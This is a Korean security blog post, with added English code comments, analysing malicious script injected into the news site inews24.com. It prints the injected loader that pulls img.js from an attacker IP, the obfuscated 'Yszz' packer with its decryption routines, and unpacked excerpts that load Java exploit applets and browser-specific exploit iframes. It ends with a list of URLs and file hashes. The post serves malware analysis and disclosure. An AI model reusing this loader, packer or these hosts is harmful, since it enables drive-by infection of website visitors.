이제는 지친다!!! inews24.com 에서 유포중이다!
주말마다 관리자는 무엇을 하고있을까??
내부 소스에는 이와 같이 스페이스와 탭으로 이루어진 스크립트가 삽입되어 있다!
// Injected loader as found in the page source. unescape() turns the percent-encoded
// string into a <script src=...> tag (shown decoded just below) and document.write()
// inserts it into the page, so the remote img.js is requested when the page renders.
document.write(unescape("%3Cscript%20src%3Dhttp%3A%2F%2F205%2E164%2E5%2E190%2Fpic%2Fimg%2Ejs%3E%3C%2Fscript%3E"));
--------------------------------------------------------------------------------------------
<script src=http://205.164.5.190/pic/img.js>
~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip)
~>http://205.164.5.190/pic/swfobject.js
~>http://205.164.5.190/pic/jpg.js
~>http://205.164.5.190/pic/css.html (취약점 미삽입!)
~> http://count24.51yes.com/click.aspx?id=249419322&logo=1
(Yszz 1.3 vip)
// Key fragments: each variable holds percent-escapes split into separate string
// pieces. They are concatenated into XGpwn2 further down and unescaped before use.
var MDIxo="%78"+"%6F"; // unescapes to "xo"
var OIai8="%78"+"%6F"+"%31"; // unescapes to "xo1"
생략
// ERb7H unescapes to "ox" (last key fragment).
// The statement that follows is one comma-chained `var`; the post's author elided
// parts of it with "생략" ("omitted"), so it is not runnable as printed.
//   XGpwn2        - the key fragments concatenated (still percent-escaped); it is
//                   unescaped later and passed to kaixin() as its second argument
//   AVgHbu2f      - alias for the global unescape()
//   Cn6T4bG0znIi  - the encoded payload blob that is fed to ZjykejU6() at the end
//   HUx2Ydz       - escapes that decode to "document"
//   sac5pxhFS     - escapes that decode to "write"
//   ubo8KLEZHIPX2 - declared here, assigned later
var ERb7H="%6F"+"%78";
var XGpwn2 =MDIxo+OIai8+HHYWv+CvXWz+JZyjl+ERb7H,AVgHbu2f=unescape,Cn6T4bG0znIi="aQCLHa58Cy3fSGI3MeP1sEO
KRLywbDXIIzBxULkgBn/D0nB/kT9MVqK/29rPw+7wspSSX4qYH3H4TMrS3lDaseKuZ+5ydruhSG6XAlVl81Fqy/9y5cz3aprjhQx6MLTaMoj9q650TsrPzkXNwh+Z77NWOlZvxX7bOFMlKO7BdlwwlwnujykUFSoyNi8snQ+N90mn7nOnAIzNndUPtUkLV/+B1YT9M1u+RRtR7fwCuD1F07IFFzf1aSbcqtdf2NMKG6xhSPeynlrxqj3uDGf41xlplDX8xIv0fepd4XsS+jZP0D0iy/B5RfpVqyMzuBPycllafgA9zCmrLhtJ0OmdlfXsc22xMemu1U6BxUyQMGxAokvOwqpdb+W9Sk2QCmcqsMewdHbk/Jfbqbee2cW9YtHv29tJaQo8WB7+7fZvONnukFDbr3ifuZTi6aT3gB4mHIazWfWZzKBTqhU2Nq
SqIM8cUmhw6TD+Wu/rlVT5SWujvvnaX9xYRSaNmOfrcrdRlS8838eJuA9RF
생략
+5f/QUEljDMY7HL0QPa0a087YViC/IbXMKTHlhaKoQM+IOuE5Gwz3GjltVa+yIvONfdD+c2uDwP4Q=",HUx2Ydz="%64"+"%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",
sac5pxhFS="%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;
// Built-in names are stored percent-escaped and decoded at run time, so the words
// "String", "fromCharCode" and "Array" never appear literally in the script.
// After this run, window[fxTmFiR][xZW9RVt] is window.String.fromCharCode and
// window[x83QqGV] is window.Array.
var B83pNx = "%53"+"%74"+"%72"+"%69"+"%6e"+"%67"; // "String"
var WjuQFO = "%66"+"%72"+"%6f"+"%6d"+"%43"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65"; // "fromCharCode"
var fxTmFiR = AVgHbu2f(B83pNx);
var xZW9RVt = AVgHbu2f(WjuQFO);
var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79"; // "Array"
var x83QqGV = AVgHbu2f(sATWUn);
// tzWmUni(str): UTF-8 decoder. Treats each character of `str` as one byte and
// rebuilds the text, dispatching on the top four bits of the lead byte:
//   0-7    -> single-byte character, copied as is
//   12, 13 -> two-byte sequence
//   14     -> three-byte sequence
// Lead values with no case (top nibble 8-11 or 15) are skipped without output.
// Characters are produced through window[fxTmFiR][xZW9RVt], i.e. String.fromCharCode.
// Returns the decoded string.
function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
return out.join('');}
// Reverse lookup table for ZjykejU6(), built with window["Array"](...): the index is
// a character code, the value its 6-bit number, and -1 marks a character that is
// not in the alphabet. The middle of the list was elided by the post's author
// ("생략"); the visible tail (values up to 51 followed by -1 entries) is consistent
// with a standard Base64 table - confirm against the full sample.
var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,생략7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4
7,48,49,50,51,-1,-1,-1,-1,-1);
// From here on HUx2Ydz holds the plain string "document".
HUx2Ydz=AVgHbu2f(HUx2Ydz);
// ZjykejU6(str): Base64-style decoder driven by the ZjykejU6Chars table.
// Reads four table values (YS1..YS4) per round and emits up to three characters
// through window[fxTmFiR][xZW9RVt] (String.fromCharCode). Characters that map to -1
// are skipped; character code 61 ('=') in the third or fourth position ends decoding.
// Returns the decoded string, one character per output byte.
// The embedded "Yszz 1.3 vip" comment is the marker the post uses to name the packer.
function ZjykejU6(str)
{var YS1,YS2,YS3,YS4;/*Yszz 1.3 vip*/var i,len,out;
len=str.length;i=0;out = "";
while(i<len)
// Each do/while below skips input characters that are not in the table.
{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);
if(YS1==-1)
break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);
if(YS2==-1)
break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));
// 61 is '=' (padding): return what has been decoded so far.
do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)
return out;
YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);
if(YS3==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));
do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)
return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)
break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}
return out}
// long2str(v, w): turns an array of 32-bit words back into a string, four characters
// per word, lowest byte first. The array `v` is overwritten in place with the
// per-word strings before being joined.
// When `w` is truthy, the last word of `v` (read before the conversion) is taken as
// the length and the joined string is cut to that many characters.
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v[i]=window[fxTmFiR][xZW9RVt](v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
// str2long(s, w): packs a string into an array of 32-bit words, four character codes
// per word with the first character in the lowest byte (the inverse of long2str).
// When `w` is truthy, the string length is appended as an extra final word.
// Reading past the end of `s` yields NaN from charCodeAt, which the bitwise OR
// treats as 0, so a short final group is zero-padded.
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
// ubo8KLEZHIPX2 = unescape(XGpwn2): the plain-text key later handed to kaixin().
ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);
// kaixin(str, Udkz): block-cipher decryption of `str` with key `Udkz`.
// The round structure, the delta constant 0x9E3779B9 and the round count
// floor(6 + 52/(n+1)) match the widely published JavaScript XXTEA decrypt routine;
// only the function and parameter names differ.
//   str  - ciphertext as a byte-per-character string (output of ZjykejU6)
//   Udkz - key string; only k[0..3] are indexed (k[p&3^e])
// Returns "" for empty input, otherwise long2str(v, true), i.e. the plaintext cut to
// the length stored in the last decrypted word.
// After the inner for loop `p` is 0, so the v[0] step uses k[0&3^e].
function kaixin(str,Udkz){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
// Unpacking driver. sac5pxhFS becomes the plain string "write".
sac5pxhFS=AVgHbu2f(sac5pxhFS);
// JS0W is assigned without `var`, so it becomes a global.
JS0W=Cn6T4bG0znIi;
// Decode chain: Base64-style decode -> kaixin() decrypt with the unescaped key ->
// UTF-8 decode. After this line JS0W holds the unpacked page as plain text, which is
// the value to capture when analysing the sample statically.
JS0W=tzWmUni(kaixin(ZjykejU6(JS0W), ubo8KLEZHIPX2));
// Equivalent to window.document.write(JS0W): the unpacked content is written into
// the current page.
window[HUx2Ydz][sac5pxhFS] (JS0W);
-----------------------------------------------------------------------------------------------
중요한 부분!
// Excerpt from the unpacked page. Here `kaixin` is used as a DOM element (its
// creation is outside the excerpt), not as the decrypt function of the same name in
// the packer above. The element is given an archive/code pair whose entry point is a
// .class file, and a URL is passed in a custom "dota" attribute; how the class
// consumes that attribute is not visible here.
// The archive name ends in .jpg although it is loaded as code - an extension
// mismatch that is useful as a detection hint.
// The OBJECT classid quoted on the line after this excerpt is the Java Plug-in's.
kaixin.archive="K03rSYoG.jpg";
kaixin.code="GondadGondadExp.class";
kaixin.setAttribute("dota","http://209.73.158.76/css/img.css");
document.body.appendChild(kaixin);
OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93'
// Second excerpt from the unpacked page: builds a Java <applet> element at run time
// and attaches it to the document.
document.write("<br>");
var kaixinq = document.createElement("body");
document.body.appendChild(kaixinq);
var kaixiny = document.createElement("applet");
kaixiny.width = "256";
kaixiny.height = "256";
// The archive carries an image extension; the post's hash list records the file as
// tRMfS.zip, so it is presumably a ZIP/JAR served under a .jpg name - confirm
// against the sample.
kaixiny.archive = "tRMfS.jpg";
// "cve2012xxxx" is printed as it appears in the post; no CVE number is given here.
kaixiny.code = "cve2012xxxx.Gondvv.class";
// Custom attributes set on the applet element. The URL is the one the post labels
// as the final file; what the class does with "bn", "si" and "bs" is not shown.
kaixiny.setAttribute("xiaomaolv", "http://209.73.158.76/css/img.css");
kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");
kaixiny.setAttribute("si", "conglaiyebuqi");
kaixiny.setAttribute("bs", "748");
document.body.appendChild(kaixiny);
// Fallback branch of a check that lies outside this excerpt (the matching `if` and
// the closing brace are not shown). It selects a page by User-Agent substring:
//   "msie 8.0"              -> iframe to LihTNR.html
//   "msie 6.0" / "msie 7.0" -> iframe to mO4b9.html
// The "(Yszz 1.3 vip)" text inside the two string literals looks like the post
// author's annotation that those pages use the same packer, not part of the
// sample - confirm against the original.
// `pcss` is assigned but not used in the visible lines.
else {
var pcss=navigator.userAgent.toLowerCase();
var UaYcKzD2 = window.navigator.userAgent.toLowerCase();
if ((UaYcKzD2.indexOf('msie 8.0') > -1))
{
document.writeln("<iframe src=LihTNR.html(
Yszz 1.3 vip
)><\/iframe>");
}
else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))
{
document.writeln("<iframe src=mO4b9.html(
Yszz 1.3 vip
)><\/iframe>");
}
연결지 정리 !
* 아래 주소에 접속해 감염될 경우 그 책임은 본인에게 있음을 알려 드립니다!
http://205.164.5.190/pic/img.js
~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip)
~> http://209.73.158.76/css/img.css (최종파일)
~> tRMfS.jpg,
cve2012xxxx.Gondvv.class, mO4b9.html, LihTNR.html
~>http://205.164.5.190/pic/swfobject.js
~>http://205.164.5.190/pic/jpg.js
~>http://205.164.5.190/pic/css.html (취약점 미삽입!)
~>http://count24.51yes.com/click.aspx?id=249419322&logo=1
MD5 및 바이러스 토탈 결과 !
fd095a3357e85b4f4e5c27a9269ca021 css.html
bf1ca09bb8d9198d852a6b1ba68a355d Gondvv.class
acb18b560c15f972dbfbe7df5b5a8ae7 Gondzz.class
140c02cb07a6bf56a7b4a22020f03716 img.css
3c15a098eac02881b93014685a766674 img.html
6987108c7f85c4b6f097598433a3819f img.js
97c9b5b98c75bc4d20ccd6f8e28b0a7b jpg.js
6c6799dd660ceda52cf31a46a34e3e3c LihTNR.html
5a38c126e782bc11206c7237967ad8f3 mO4b9.html
de89a5739a7e333071160a552aa32b63 swfobject.js
8990ccdbed763ef8aa3943b085313f88 tRMfS.zip
샘플 필요시 댓글 주세요! 아이뉴스 샘플.zip * 암호 설정중!
지난 아이뉴스 유포 글!
2012/09/01 - [security/악성코드 유포] - http://www.inews24.com 악성코드 유포중 !
2012/06/30 - [security/악성코드 유포] - 악성코드 유포중에 있는 inews24.com 악성 스크립트 정리 !
2012/06/29 - [security/악성코드 유포] - inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 !